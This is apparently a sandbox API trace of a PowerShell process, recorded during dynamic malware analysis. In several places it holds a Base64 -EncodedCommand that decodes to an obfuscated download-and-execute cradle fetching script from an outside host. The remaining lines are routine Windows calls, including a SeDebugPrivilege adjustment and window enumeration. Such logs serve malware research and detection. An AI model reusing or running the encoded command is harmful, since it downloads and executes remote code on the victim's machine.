	[0819.486] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0819.486] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0819.486] CoTaskMemFree (pv=0x2b2450) 
	[0819.492] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0819.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0819.492] CoTaskMemFree (pv=0x2b2450) 
	[0819.494] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c74dee0 | out: pNumArgs=0x1c74dee0) returned 0x2c1690*=""
	[0819.495] lstrlenW (lpString="-EncodedCommand") returned 15
	[0819.496] CoTaskMemAlloc (cb=0x22) returned 0x1b3f9e20
	[0819.496] RtlMoveMemory (in: Destination=0x1b3f9e20, Source=0x2c16b2, Length=0x20 | out: Destination=0x1b3f9e20) 
	[0819.496] CoTaskMemFree (pv=0x1b3f9e20) 
	[0819.496] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0819.496] CoTaskMemAlloc (cb=0x2f4) returned 0x1b40eba0
	[0819.496] RtlMoveMemory (in: Destination=0x1b40eba0, Source=0x2c16d2, Length=0x2f2 | out: Destination=0x1b40eba0) 
	[0819.496] CoTaskMemFree (pv=0x1b40eba0) 
	[0819.497] LocalFree (hMem=0x2c1690) returned 0x0
	[0819.498] CoTaskMemAlloc (cb=0x804) returned 0x1b407bd0
	[0819.498] GetConsoleTitleW (in: lpConsoleTitle=0x1b407bd0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0819.498] CoTaskMemFree (pv=0x1b407bd0) 
	[0819.507] CoTaskMemAlloc (cb=0x38e) returned 0x2c1690
	[0819.507] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c74de40*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f88328 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f88328*(hProcess=0x398, hThread=0x360, dwProcessId=0x2264, dwThreadId=0x2330)) returned 1
	[0820.039] CoTaskMemFree (pv=0x2c1690) 
	[0820.040] CloseHandle (hObject=0x360) returned 1
	[0820.040] CoTaskMemAlloc (cb=0x3b) returned 0x2c9860
	[0820.040] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c74dee8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c74dee8) returned 0x4550
	[0820.041] CoTaskMemFree (pv=0x2c9860) 
	[0820.044] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.044] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.045] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c74dfc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c74dfc8*=0x360) returned 1

Process:
	id = "55"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x22020000"
	os_pid = "0xee0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 303
	os_tid = 0xee4

	[0570.302] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0575.095] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0575.095] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0575.095] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0575.095] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0590.243] GetVersionExW (in: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0590.245] GetVersionExW (in: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0590.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.589] GetVersionExW (in: lpVersionInformation=0x1ed690*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed690*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0591.590] SetErrorMode (uMode=0x1) returned 0x1
	[0591.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed7f0 | out: lpFileInformation=0x1ed7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0591.592] SetErrorMode (uMode=0x1) returned 0x1
	[0591.595] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1eda60 | out: lpdwHandle=0x1eda60) returned 0x94c
	[0591.596] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b372d8 | out: lpData=0x2b372d8) returned 1
	[0591.598] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed9d8, puLen=0x1ed9d0 | out: lplpBuffer=0x1ed9d8*=0x2b37374, puLen=0x1ed9d0) returned 1
	[0591.600] lstrlenW (lpString="䅁") returned 1
	[0591.610] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b37450, puLen=0x1ed940) returned 1
	[0591.611] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0591.612] CoTaskMemAlloc (cb=0x2e) returned 0x3d67b0
	[0591.613] lstrcpyW (in: lpString1=0x3d67b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0591.613] CoTaskMemFree (pv=0x3d67b0) 
	[0591.613] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b374a4, puLen=0x1ed940) returned 1
	[0591.614] lstrlenW (lpString="System.Management.Automation") returned 28
	[0591.614] CoTaskMemAlloc (cb=0x3c) returned 0x319860
	[0591.614] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0591.614] CoTaskMemFree (pv=0x319860) 
	[0591.614] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b37500, puLen=0x1ed940) returned 1
	[0591.614] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0591.614] CoTaskMemAlloc (cb=0x20) returned 0x3d4ae0
	[0591.614] lstrcpyW (in: lpString1=0x3d4ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0591.614] CoTaskMemFree (pv=0x3d4ae0) 
	[0591.614] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b37540, puLen=0x1ed940) returned 1
	[0591.614] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0591.614] CoTaskMemAlloc (cb=0x44) returned 0x319860
	[0591.614] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0591.614] CoTaskMemFree (pv=0x319860) 
	[0591.614] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b375a8, puLen=0x1ed940) returned 1
	[0591.614] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0591.614] CoTaskMemAlloc (cb=0x76) returned 0x37f9a0
	[0591.614] lstrcpyW (in: lpString1=0x37f9a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0591.614] CoTaskMemFree (pv=0x37f9a0) 
	[0591.614] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b37644, puLen=0x1ed940) returned 1
	[0591.614] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0591.614] CoTaskMemAlloc (cb=0x44) returned 0x319860
	[0591.614] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0591.615] CoTaskMemFree (pv=0x319860) 
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b376a8, puLen=0x1ed940) returned 1
	[0591.615] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0591.615] CoTaskMemAlloc (cb=0x58) returned 0x338d60
	[0591.615] lstrcpyW (in: lpString1=0x338d60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0591.615] CoTaskMemFree (pv=0x338d60) 
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b37724, puLen=0x1ed940) returned 1
	[0591.615] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0591.615] CoTaskMemAlloc (cb=0x20) returned 0x3d4ae0
	[0591.615] lstrcpyW (in: lpString1=0x3d4ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0591.615] CoTaskMemFree (pv=0x3d4ae0) 
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2b373cc, puLen=0x1ed940) returned 1
	[0591.615] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0591.615] CoTaskMemAlloc (cb=0x66) returned 0x3cf0e0
	[0591.615] lstrcpyW (in: lpString1=0x3cf0e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0591.615] CoTaskMemFree (pv=0x3cf0e0) 
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x0, puLen=0x1ed940) returned 0
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x0, puLen=0x1ed940) returned 0
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x0, puLen=0x1ed940) returned 0
	[0591.615] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed918, puLen=0x1ed910 | out: lplpBuffer=0x1ed918*=0x2b37374, puLen=0x1ed910) returned 1
	[0591.618] CoTaskMemAlloc (cb=0x204) returned 0x382330
	[0591.618] VerLanguageNameW (in: wLang=0x0, szLang=0x382330, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0591.620] CoTaskMemFree (pv=0x382330) 
	[0591.620] VerQueryValueW (in: pBlock=0x2b372d8, lpSubBlock="\\", lplpBuffer=0x1ed968, puLen=0x1ed960 | out: lplpBuffer=0x1ed968*=0x2b37300, puLen=0x1ed960) returned 1
	[0591.625] GetCurrentProcessId () returned 0xee0
	[0592.756] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ec890 | out: lpLuid=0x1ec890*(LowPart=0x14, HighPart=0)) returned 1
	[0592.759] GetCurrentProcess () returned 0xffffffffffffffff
	[0592.760] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ec8b0 | out: TokenHandle=0x1ec8b0*=0x1c4) returned 1
	[0592.761] AdjustTokenPrivileges (in: TokenHandle=0x1c4, DisableAllPrivileges=0, NewState=0x2b3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0592.763] CloseHandle (hObject=0x1c4) returned 1
	[0592.767] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xee0) returned 0x1c4
	[0592.776] EnumProcessModules (in: hProcess=0x1c4, lphModule=0x2b3abb8, cb=0x200, lpcbNeeded=0x1ed8c8 | out: lphModule=0x2b3abb8, lpcbNeeded=0x1ed8c8) returned 1
	[0592.779] GetModuleInformation (in: hProcess=0x1c4, hModule=0x13f370000, lpmodinfo=0x2b3ae28, cb=0x18 | out: lpmodinfo=0x2b3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0592.780] CoTaskMemAlloc (cb=0x804) returned 0x3e06f0
	[0592.780] GetModuleBaseNameW (in: hProcess=0x1c4, hModule=0x13f370000, lpBaseName=0x3e06f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0592.780] CoTaskMemFree (pv=0x3e06f0) 
	[0592.781] CoTaskMemAlloc (cb=0x804) returned 0x3e06f0
	[0592.781] GetModuleFileNameExW (in: hProcess=0x1c4, hModule=0x13f370000, lpFilename=0x3e06f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0592.781] CoTaskMemFree (pv=0x3e06f0) 
	[0592.782] CloseHandle (hObject=0x1c4) returned 1
	[0593.969] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xee0) returned 0x1c4
	[0593.970] GetExitCodeProcess (in: hProcess=0x1c4, lpExitCode=0x1ed9f8 | out: lpExitCode=0x1ed9f8*=0x103) returned 1
	[0593.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b3b088, Length=0x20000, ResultLength=0x1ed9c0 | out: SystemInformation=0x12b3b088, ResultLength=0x1ed9c0*=0x35720) returned 0xc0000004
	[0593.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b5b0b8, Length=0x37f20, ResultLength=0x1ed9c0 | out: SystemInformation=0x12b5b0b8, ResultLength=0x1ed9c0*=0x35720) returned 0x0
	[0595.068] EnumWindows (lpEnumFunc=0x28466ac, lParam=0x0) returned 1
	[0600.725] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0602.781] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x558
	[0603.337] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0603.339] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0606.159] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0607.222] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0607.734] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0607.736] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0609.265] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0609.268] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0609.275] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0609.277] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0609.278] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0610.713] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0610.716] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0610.718] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0610.719] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0611.573] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0611.575] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0611.576] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0612.850] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x3a8
	[0612.853] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1bd0
	[0612.855] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1bfc
	[0612.857] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1a78
	[0612.858] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b90
	[0618.607] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b04
	[0618.613] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b34
	[0618.616] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b64
	[0618.617] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1bb0
	[0618.619] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1acc
	[0618.620] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1a2c
	[0619.902] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x19a8
	[0619.907] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1944
	[0620.959] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x18c8
	[0621.434] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x18ac
	[0621.439] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x18ec
	[0621.443] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1898
	[0621.443] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc98
